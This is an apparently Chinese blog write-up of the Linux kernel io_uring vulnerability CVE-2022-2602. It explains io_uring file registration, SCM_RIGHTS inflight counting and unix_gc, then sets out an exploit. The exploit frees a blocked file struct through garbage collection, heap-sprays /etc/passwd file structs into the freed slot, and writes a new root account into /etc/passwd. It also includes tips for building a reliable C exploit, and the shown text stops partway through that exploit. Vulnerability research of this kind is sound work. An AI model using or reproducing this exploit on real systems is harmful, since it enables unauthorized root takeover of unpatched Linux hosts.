0%

DirtyFile+CVE-2022-2602

CVE-2022-2602

1
Linux version 5.13.1 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-2ubuntu1~20.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Wed Mar 13 11:24:24 CST 2024
1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

io_uring 模块

io_uring 会把要内核做的 io 操作都放在一个队列里,内核空闲的时候就会从任务队列里拿你给它的 io 任务去完成,等你觉得内核做完了你给它的 io 任务的时候,你就去结果队列里取结果就行了

提交任务的环叫 SQ,里面的每个任务叫 SQE,获取结果的环叫 CQ,里面的每个结果叫 CQE

io_uring 的具体实现是通过下面三个系统调用:

  • io_uring_setup:初始化 io_uring
    • 初始化 io_uring 的两个环形队列(SQ,CQ)
    • 为 io_uring 创建一个文件对象(后续使用这个文件描述符映射出内存,来访问两个队列和创建相关资源)
  • io_uring_enter:通知内核任务已经提交或获取任务结果
    • 任务发送和结果接收需要使用 io_uring_enter
    • io_uring 提供了一个轮训模式 IORING_SETUP_SQPOLL,在该模式下,内核会自动取检查任务队列里是否有新任务并去完成,而不需要我们去调用 io_uring_enter 系统调用(底层使用了内核线程)
  • io_uring_register:注册共享缓冲区
    • 将文件描述符或内存区域与 io_uring 关联起来

安装 liburing 生成 liburing.a / liburing.so.2.2:

1
2
3
wget https://github.com/axboe/liburing/archive/liburing-2.2.zip
make
sudo make install

liburing 中会提供一些 io_uring API:

1
2
3
#include <liburing.h>

struct io_uring_sqe *io_uring_get_sqe(struct io_uring *ring);
  • 从属于 ring 参数的提交队列中获取下一个可用的提交队列条目
  • 成功时返回一个指向提交队列条目的指针,失败时返回 NULL
1
2
3
#include <liburing.h>

int io_uring_submit(struct io_uring *ring);
  • 将下一个事件提交到属于 ring 的提交队列
  • 成功时返回提交的提交队列条目数,失败时返回 -errno

调用者先使用 io_uring_get_sqe 检索提交队列条目,然后初始化 SQE(可以通过 API 辅助填写),最后使用 io_uring_submit 提交

用于提交请求的 io_uring_enter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32,
min_complete, u32, flags, const void __user *, argp, size_t,
argsz)
{

......

if (ctx->flags & IORING_SETUP_SQPOLL) {

......

} else if (to_submit) {
ret = io_uring_add_task_file(ctx);
if (unlikely(ret))
goto out;
mutex_lock(&ctx->uring_lock);
submitted = io_submit_sqes(ctx, to_submit); /* 核心函数 */
mutex_unlock(&ctx->uring_lock);

if (submitted != to_submit)
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {

......

}

out:
percpu_ref_put(&ctx->refs);
out_fput:
fdput(f);
return submitted ? submitted : ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
{
int submitted = 0;

/* make sure SQ entry isn't read before tail */
nr = min3(nr, ctx->sq_entries, io_sqring_entries(ctx));

if (!percpu_ref_tryget_many(&ctx->refs, nr))
return -EAGAIN;

percpu_counter_add(&current->io_uring->inflight, nr);
refcount_add(nr, &current->usage);
io_submit_state_start(&ctx->submit_state, nr);

while (submitted < nr) { /* 处理所有请求 */
const struct io_uring_sqe *sqe; /* 代表一个SQE(提交任务) */
struct io_kiocb *req;

req = io_alloc_req(ctx);
if (unlikely(!req)) {
if (!submitted)
submitted = -EAGAIN;
break;
}
sqe = io_get_sqe(ctx); /* 获取用户传入的io_uring_sqe结构体 */
if (unlikely(!sqe)) {
kmem_cache_free(req_cachep, req);
break;
}
/* will complete beyond this point, count as submitted */
submitted++;
if (io_submit_sqe(ctx, req, sqe)) /* 核心函数(处理提交任务) */
break;
}

if (unlikely(submitted != nr)) {
int ref_used = (submitted == -EAGAIN) ? 0 : submitted;
struct io_uring_task *tctx = current->io_uring;
int unused = nr - ref_used;

percpu_ref_put_many(&ctx->refs, unused);
percpu_counter_sub(&tctx->inflight, unused);
put_task_struct_many(current, unused);
}

io_submit_state_end(&ctx->submit_state, ctx);
/* Commit SQ ring head once we've consumed and submitted all SQEs */
io_commit_sqring(ctx);

return submitted;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
static int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
/* 这里的io_uring_sqe由用户设置并传入 */
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe); /* 初始化提交任务(将sqe中的信息填写到req中) */
if (unlikely(ret)) {
fail_req:
if (link->head) {
/* fail even hard links since we don't submit */
link->head->flags |= REQ_F_FAIL_LINK;
io_req_complete_failed(link->head, -ECANCELED);
link->head = NULL;
}
io_req_complete_failed(req, ret);
return ret;
}
ret = io_req_prep(req, sqe); /* 准备调用任务,这里会进行文件权限的判断 */
if (unlikely(ret))
goto fail_req;

/* don't need @sqe from now on */
trace_io_uring_submit_sqe(ctx, req->opcode, req->user_data, true,
ctx->flags & IORING_SETUP_SQPOLL);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (link->head) {
struct io_kiocb *head = link->head;

/*
* Taking sequential execution of a link, draining both sides
* of the link also fullfils IOSQE_IO_DRAIN semantics for all
* requests in the link. So, it drains the head and the
* next after the link request. The last one is done via
* drain_next flag to persist the effect across calls.
*/
if (req->flags & REQ_F_IO_DRAIN) {
head->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 1;
}
ret = io_req_prep_async(req);
if (unlikely(ret))
goto fail_req;
trace_io_uring_link(ctx, req, head);
link->last->link = req;
link->last = req;

/* last request of a link, enqueue the link */
if (!(req->flags & (REQ_F_LINK | REQ_F_HARDLINK))) {
io_queue_sqe(head);
link->head = NULL;
}
} else {
if (unlikely(ctx->drain_next)) {
req->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 0;
}
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
link->head = req;
link->last = req;
} else {
io_queue_sqe(req); /* 尝试执行提交任务 */
}
}

return 0;
}
  • 这里先检查了文件的权限,然后调用 io_queue_sqe 执行如下的调用链
1
io_queue_sqe->__io_queue_sqe->io_issue_sqe
  • 在 io_issue_sqe 中会根据 req->opcode 来调用不同的函数进行处理,在这些函数中可能会因为 inode 锁而陷入阻塞
  • 由于之前已经完成的权限检查,如果在阻塞时 file 结构体被非法释放,就可能存在 DirtyFile 的风险

初始化提交任务的 io_init_req 函数源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
struct io_submit_state *state;
unsigned int sqe_flags;
int personality, ret = 0;

req->opcode = READ_ONCE(sqe->opcode);
/* same numerical values with corresponding REQ_F_*, safe to copy */
req->flags = sqe_flags = READ_ONCE(sqe->flags);
req->user_data = READ_ONCE(sqe->user_data);
req->async_data = NULL;
req->file = NULL;
req->ctx = ctx;
req->link = NULL;
req->fixed_rsrc_refs = NULL;
/* one is dropped after submission, the other at completion */
atomic_set(&req->refs, 2);
req->task = current;
req->result = 0;
req->work.creds = NULL;

/* enforce forwards compatibility on users */
if (unlikely(sqe_flags & ~SQE_VALID_FLAGS))
return -EINVAL;
if (unlikely(req->opcode >= IORING_OP_LAST))
return -EINVAL;
if (unlikely(!io_check_restriction(ctx, req, sqe_flags)))
return -EACCES;

if ((sqe_flags & IOSQE_BUFFER_SELECT) &&
!io_op_defs[req->opcode].buffer_select)
return -EOPNOTSUPP;

personality = READ_ONCE(sqe->personality);
if (personality) {
req->work.creds = xa_load(&ctx->personalities, personality);
if (!req->work.creds)
return -EINVAL;
get_cred(req->work.creds);
}
state = &ctx->submit_state;

/*
* Plug now if we have more than 1 IO left after this, and the target
* is potentially a read/write to block based storage.
*/
if (!state->plug_started && state->ios_left > 1 &&
io_op_defs[req->opcode].plug) {
blk_start_plug(&state->plug);
state->plug_started = true;
}

if (io_op_defs[req->opcode].needs_file) {
bool fixed = req->flags & REQ_F_FIXED_FILE; /* REQ_F_FIXED_FILE其实就是用户态传入的IOSQE_FIXED_FILE,代表ctx拥有file结构体 */

req->file = io_file_get(state, req, READ_ONCE(sqe->fd), fixed);
if (unlikely(!req->file))
ret = -EBADF;
}

state->ios_left--;
return ret;
}
  • 当用户态传入 io_uring_sqe->flags = IOSQE_FIXED_FILE 时,此时的 io_uring_sqe->fd 不再是 io_uring 需要处理的文件描述符,而是代表了 skb->fp->fp 中对应文件描述符的下标
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static struct file *io_file_get(struct io_submit_state *state,
struct io_kiocb *req, int fd, bool fixed)
{
struct io_ring_ctx *ctx = req->ctx;
struct file *file;

if (fixed) {
unsigned long file_ptr;

if (unlikely((unsigned int)fd >= ctx->nr_user_files))
return NULL;
fd = array_index_nospec(fd, ctx->nr_user_files);
file_ptr = io_fixed_file_slot(&ctx->file_table, fd)->file_ptr; /* 通过索引计算出file结构体的地址 */
file = (struct file *)(file_ptr & FFS_MASK);
file_ptr &= ~FFS_MASK;
/* mask in overlapping REQ_F and FFS bits */
req->flags |= (file_ptr << REQ_F_ASYNC_READ_BIT);
io_req_set_rsrc_node(req);
} else {
trace_io_uring_file_get(ctx, fd);
file = __io_file_get(state, fd); /* __io_file_get中会直接调用fget(fd)获取file结构体 */

/* we don't allow fixed io_uring files */
if (file && unlikely(file->f_op == &io_uring_fops))
io_req_track_inflight(req);
}

return file;
}

用于注册的 io_uring_register 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
{
struct io_ring_ctx *ctx;
long ret = -EBADF;
struct fd f;

f = fdget(fd);
if (!f.file)
return -EBADF;

ret = -EOPNOTSUPP;
if (f.file->f_op != &io_uring_fops)
goto out_fput;

ctx = f.file->private_data;

io_run_task_work();

mutex_lock(&ctx->uring_lock);
ret = __io_uring_register(ctx, opcode, arg, nr_args); /* 核心函数 */
mutex_unlock(&ctx->uring_lock);
trace_io_uring_register(ctx, opcode, ctx->nr_user_files, ctx->nr_user_bufs,
ctx->cq_ev_fd != NULL, ret);
out_fput:
fdput(f);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

......

case IORING_REGISTER_FILES:
ret = io_sqe_files_register(ctx, arg, nr_args, NULL); /* 核心函数 */
break;

......

if (io_register_op_must_quiesce(opcode)) {
/* bring the ctx back to life */
percpu_ref_reinit(&ctx->refs);
reinit_completion(&ctx->ref_comp);
}
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
static int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned nr_args, u64 __user *tags)
{
__s32 __user *fds = (__s32 __user *) arg;
struct file *file;
int fd, ret;
unsigned i;
struct io_rsrc_data *file_data;

if (ctx->file_data)
return -EBUSY;
if (!nr_args)
return -EINVAL;
if (nr_args > IORING_MAX_FIXED_FILES)
return -EMFILE;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;

file_data = io_rsrc_data_alloc(ctx, io_rsrc_file_put, nr_args);
if (!file_data)
return -ENOMEM;
ctx->file_data = file_data;
ret = -ENOMEM;
if (!io_alloc_file_tables(&ctx->file_table, nr_args))
goto out_free;

for (i = 0; i < nr_args; i++, ctx->nr_user_files++) {
/* 遍历所有用户传进来的文件描述符 */
u64 tag = 0;

if ((tags && copy_from_user(&tag, &tags[i], sizeof(tag))) ||
copy_from_user(&fd, &fds[i], sizeof(fd))) { /* 获取用户传递的文件描述符fd */
ret = -EFAULT;
goto out_fput;
}
/* allow sparse sets */
if (fd == -1) {
ret = -EINVAL;
if (unlikely(tag))
goto out_fput;
continue;
}

file = fget(fd); /* 获取文件结构体,fget会对文件引用次数+1 */
ret = -EBADF;
if (unlikely(!file))
goto out_fput;

/*
* Don't allow io_uring instances to be registered. If UNIX
* isn't enabled, then this causes a reference cycle and this
* instance can never get freed. If UNIX is enabled we'll
* handle it just fine, but there's still no point in allowing
* a ring fd as it doesn't support regular read/write anyway.
*/
if (file->f_op == &io_uring_fops) {
fput(file);
goto out_fput;
}
ctx->file_data->tags[i] = tag;
io_fixed_file_set(io_fixed_file_slot(&ctx->file_table, i), file);
}

ret = io_sqe_files_scm(ctx); /* 核心函数 */

......

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int io_sqe_files_scm(struct io_ring_ctx *ctx)
{
unsigned left, total;
int ret = 0;

total = 0;
left = ctx->nr_user_files;
while (left) { /* 遍历所有的注册文件 */
unsigned this_files = min_t(unsigned, left, SCM_MAX_FD);

ret = __io_sqe_files_scm(ctx, this_files, total); /* 核心函数 */
if (ret)
break;
left -= this_files;
total += this_files;
}

if (!ret)
return 0;

while (total < ctx->nr_user_files) {
struct file *file = io_file_from_index(ctx, total);

if (file)
fput(file);
total++;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
struct sock *sk = ctx->ring_sock->sk;
struct scm_fp_list *fpl;
struct sk_buff *skb;
int i, nr_files;

fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
if (!fpl)
return -ENOMEM;

skb = alloc_skb(0, GFP_KERNEL); /* 申请一个sk_buff */
if (!skb) {
kfree(fpl);
return -ENOMEM;
}

skb->sk = sk;

nr_files = 0;
fpl->user = get_uid(current_user());
for (i = 0; i < nr; i++) { /* 遍历所有文件 */
struct file *file = io_file_from_index(ctx, i + offset); /* 获得文件结构体 */

if (!file)
continue;
fpl->fp[nr_files] = get_file(file); /* get_file同样会使file引用次数+1,把文件注册到fpl中 */
unix_inflight(fpl->user, fpl->fp[nr_files]); /* 把文件添加到发送队列,会增加sock类型文件的inflight飞行计数 */
nr_files++;
}

if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNIXCB(skb).fp = fpl; /* skb会保存所有用户传入的file结构,存于skb->fp->fp */
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); /* skb添加到sk_receive_queue(io_uring sock的接收队列)中 */

for (i = 0; i < nr_files; i++)
fput(fpl->fp[i]); /* 对这些文件使用fput,平衡刚刚使用的get_file */
} else {
kfree_skb(skb);
kfree(fpl);
}

return 0;
}
  • 用户传入的文件描述符都会保存在 skb->fp->fp 中,如果目标 skb 被销毁,则存储在 skb->fp->fp 中所有的 file 结构体都会被执行 fput 操作
  • sk_receive_queue 代表一个 socket 还未接收的消息队列

引用计数与飞行计数

在 linux 中 file 结构体用于描述一个打开的文件,其中的 file->f_count 成员用于记录其引用数目

  • 可能存在多个文件描述符对应同一个 file 结构体的情况(多个进程打开同一个文件,或者使用 dup() 函数拷贝文件描述符)
  • 函数 open dup fork 会使 file->f_count 增加,函数 close exit 会使 file->f_count 减小,当 file->f_count 为“0”时则释放 file 结构体

实际能引起文件引用计数变化的内核函数有:

  • fget():通过文件描述符获取 struct file,并把文件引用计数 +1
  • get_file():传入是 struct file,返回 struct file,该函数单纯的把文件引用计数 +1
  • fput():减少一次文件引用计数,如果减少到 0 则会释放文件的 struct file 结构

SCM_RIGHTS 消息拥有传递文件描述符信息的能力,linux 内核可以通过 sendmsg 系统调用来传递 SCM_RIGHTS 消息,也就是在两个不相关的进程间传递文件描述符信息

  • 该功能的本意是有权限打开文件的进程打开文件,然后传递给没权限打开的进程使用
  • 当 sender 进程将文件描述符传递给另一个 receiver 进程时,SCM_RIGHTS 将创建一个对 file 结构的引用
  • 当 receiver 进程确定接收到文件描述符时,SCM_RIGHTS 创建的引用将会被消除

使用 SCM_RIGHTS 可能会造成内存泄露问题:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (fileA->f_count=1, fileA->f_count=1)
(2)将socket A 发送到 socket B (fileA->f_count=2, fileA->f_count=1)
(3)将socket B 发送到 socket A (fileA->f_count=2, fileA->f_count=2)
(4)关闭socket A (fileA->f_count=1, fileA->f_count=2)
(5)关闭socket B (fileA->f_count=1, fileA->f_count=1)
  • 由于 socket A 和 socket B 互相发给彼此的 SCM_RIGHTS 消息并没有被接收,导致 fileA->f_countfileB->f_count 都为“1”,并且没有办法将其释放掉

函数 unix_inflight 用于增加飞行计数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp); /* 只有socket和io_uring的fd才能找到sock */

spin_lock(&unix_gc_lock);

if (s) { /* 对于sock类型文件则增加飞行计数 */
struct unix_sock *u = unix_sk(s);

if (atomic_long_inc_return(&u->inflight) == 1) {
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); /* 添加到gc_inflight_list全局飞行列表 */
} else {
BUG_ON(list_empty(&u->link));
}
unix_tot_inflight++; /* 全局飞行文件数+1 */
}
user->unix_inflight++; /* 用户统计飞行计数+1 */
spin_unlock(&unix_gc_lock);
}

内核垃圾回收系统

Linux 内核垃圾回收系统就是为了防止这种情况下的内存耗尽,引入 inflight 飞行计数是为了识别潜在的垃圾

  • 当采用 SCM_RIGHTS 数据报发送文件描述符时,Linux 内核将其 unix_sock 放入全局列表 gc_inflight_list 中,并递增 unix_tot_inflight(表示飞行中的 socket 总数)
  • 然后,内核递增 u->unix_inflight 以记录每个文件描述符的飞行计数(表示正在被传递的数目)

引用飞行计数后,还是会出现不可破循环的现象:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (ref=1 inflight=0, ref=1 inflight=0)
(2)将socket A 发送到 socket B (ref=2 inflight=1, ref=1 inflight=0)
(3)将socket B 发送到 socket A (ref=2 inflight=1, ref=2 inflight=1)
(4)关闭socket A (ref=1 inflight=1, ref=2 inflight=1)
(5)关闭socket B (ref=1 inflight=1, ref=1 inflight=1)
  • 当 A 和 B 的引用计数都等于每个 socket 文件描述符的飞行计数,这是可能存在垃圾的迹象

linux 垃圾处理的核心函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
void unix_gc(void)
{
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
struct list_head cursor;
LIST_HEAD(not_cycle_list);

spin_lock(&unix_gc_lock);

/* Avoid a recursive GC. */
if (gc_in_progress)
goto out;

gc_in_progress = true;
/* First, select candidates for garbage collection. Only
* in-flight sockets are considered, and from those only ones
* which don't have any external reference.
*
* Holding unix_gc_lock will protect these candidates from
* being detached, and hence from gaining an external
* reference. Since there are no possible receivers, all
* buffers currently on the candidates' queues stay there
* during the garbage collection.
*
* We also know that no new candidate can be added onto the
* receive queues. Other, non candidate sockets _can_ be
* added to queue, so we must make sure only to touch
* candidates.
*/
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
/* 遍历gc_inflight_list全局飞行列表中的每一个成员 */
long total_refs;
long inflight_refs;

total_refs = file_count(u->sk.sk_socket->file); /* 获取文件的引用计数 */
inflight_refs = atomic_long_read(&u->inflight); /* 获取文件的飞行计数 */

BUG_ON(inflight_refs < 1);
BUG_ON(total_refs < inflight_refs);
if (total_refs == inflight_refs) { /* 引用计数和飞行计数相等则触发垃圾收集 */
list_move_tail(&u->link, &gc_candidates);
__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
}
}

/* Now remove all internal in-flight reference to children of
* the candidates.
*/
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);

/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);

/* Move cursor to after the current position. */
list_move(&cursor, &u->link);

if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, &not_cycle_list);
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);

/* Now gc_candidates contains only garbage. Restore original
* inflight counters for these as well, and remove the skbuffs
* which are creating the cycle(s).
*/
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
* cycle. Restore these to the inflight list.
*/
while (!list_empty(&not_cycle_list)) {
u = list_entry(not_cycle_list.next, struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist); /* 清理垃圾 */

spin_lock(&unix_gc_lock);

/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_in_progress = false;
wake_up(&unix_gc_wait);

out:
spin_unlock(&unix_gc_lock);
}
1
2
3
4
5
6
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
  • 垃圾收集会释放掉引用计数等于飞行计数的所有 skb,并会对 skb 中的所有 file 调用 fput

漏洞分析

影响版本:Linux Kernel < v6.0.3(v6.0.3 已修复)

漏洞效果就是在 io_uring 执行 IO 任务之前非法把文件释放掉,核心思路类似于 DirtyFile:

  • 利用另一个线程提前打开 io_uring 需要写入的文件
  • 在 io_uring 陷入阻塞的时候将该文件的 file 结构体释放掉
  • 堆喷另一个文件的 file 结构体来占位
  • 另一个线程释放 inode 锁,io_uring 拿到锁后就会写入目标文件了

如何在 io_uring 阻塞时释放其将要操作的 file 结构体,理论上来说 io_uring 始终会占用一个文件计数器,目标 file 结构体的文件计数器是不可能为 “0” 的

但在 unix_gc 释放 skb 的过程中会对 skb 中的所有 file 调用 fput,这里没有考虑 io_uring file 可能会阻塞的问题(逻辑漏洞),导致该 file 在任务阻塞完毕之前被释放,从而造成 UAF

入侵思路

漏洞的触发过程比较复杂,分析了网上很多的 wp 和 exp 后,提取出如下的关键代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* 准备一对socket(s[0],s[1]),准备好之后默认的引用计数均为1 */

fd = io_uring_setup(32, params); /* 获取一个文件描述符记为fd,初始状态引用计数为1 */

rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644); /* 打开一个普通可读写文件,初始状态引用计数为1 */
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* 使用io_uring_register的注册功能将s[1]和rfd[1]注册到fd中 */
/*
s[1]和rfd[1]生成对应的skb保存到了fd的sk->sk_receive_queue队列中
s[1]和rfd[1]对应的file结构体都存放入skb->fp->fp中
> s[1]:引用计数2,飞行计数1
> rfd[1]:引用计数2,飞行计数0
> fd:引用计数1,飞行计数0
*/

close(rfd[1]); /* 关闭rfd[1],引用计数1 */

sendfd(s[0], fd); /* 使用s[0]将fd发送给s[1],fd引用计数2,飞行计数1 */

close(s[0]); /* 引用计数0,被释放 */
close(s[1]); /* 引用计数1,飞行计数1,暂时不会被释放 */

pthread_create(&t, NULL, slow_write, NULL);
/*
先往"/tmp/rwA"文件写入大量数据,占据inode文件锁
再向fd(io_uring)提交一个文件写(writev)的任务,往"/tmp/rwA"文件写入恶意数据(新的root账户和密码)
这个任务就会阻塞在文件权限检查之后,实际写之前
*/

io_uring_queue_exit(&ring); /* 关闭fd,fd的引用计数1(此时io_uring暂时不会被释放,可以正常工作) */

if(!fork()){ /* 创建一个socket,并且关闭,触发垃圾回收unix_gc */
close(socket(AF_UNIX, SOCK_DGRAM, 0));
exit(0);
}

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT);
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

close(fd);

触发流程如下:

线程A 线程B
进行准备工作
启动线程B 打开"/tmp/rwA"文件,写入大量数据(0x80000 * 0x1000 字节)
打开"/tmp/rwA"文件,尝试写入恶意数据(新的 root 账号和密码),提交写任务到 io_uring 通过文件权限校验,并获取 inode 文件锁
通过文件权限校验,等待获取 inode 文件锁(io_uring 阻塞) 长时间写入…(持有锁)
触发垃圾回收 unix_gc(在获取 inode 文件锁之前,释放目标 file 结构体) 长时间写入…(持有锁)
打开大量"/etc/passwd"文件,堆喷占位刚刚释放的 file 结构体 释放 inode 文件锁
获得 inode 文件锁,但实际会写入"/etc/passwd"文件(因为 file 结构体被替换)
  • io_uring 会因为线程B占用 "/tmp/rwA" 文件而阻塞(等待 inode 文件锁)
  • 利用阻塞的时间来触发垃圾回收释放阻塞的 file 结构体,造成 UAF
  • 大量打开 "/etc/passwd" 文件的 file 结构体来填充 UAF
  • 最后获取 inode 文件锁时,实际上就是往 "/etc/passwd" 文件中写入数据了

完整 exp 如下:(最好使用 gcc-9 来编译,测试发现 gcc-9 的打通率要显著高于其它版本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
#define _GNU_SOURCE

#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <liburing.h>
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <err.h>
#include <sched.h>

#define GREEN(x) printf("\033[0;32m"); printf(x); printf("\033[0m");
#define RESET printf("\033[0m")

#define SPIN ({ GREEN("[/]"); \
GREEN("\b\b-]"); \
GREEN("\b\b\\]"); \
GREEN("\b\b|]"); \
GREEN("\b\b-]"); \
GREEN("\b\b|]"); \
GREEN("\b\b\b");\
});

int *start_write;

void pin_cpu(int num){
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(num, &mask);
int result = sched_setaffinity(0, sizeof(mask), &mask);
}

void *slow_write() {
printf("[+] Start slow write to get the lock\n");
int fd = open("/tmp/rwA", 1);

if (fd < 0) {
perror("[!] error open file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
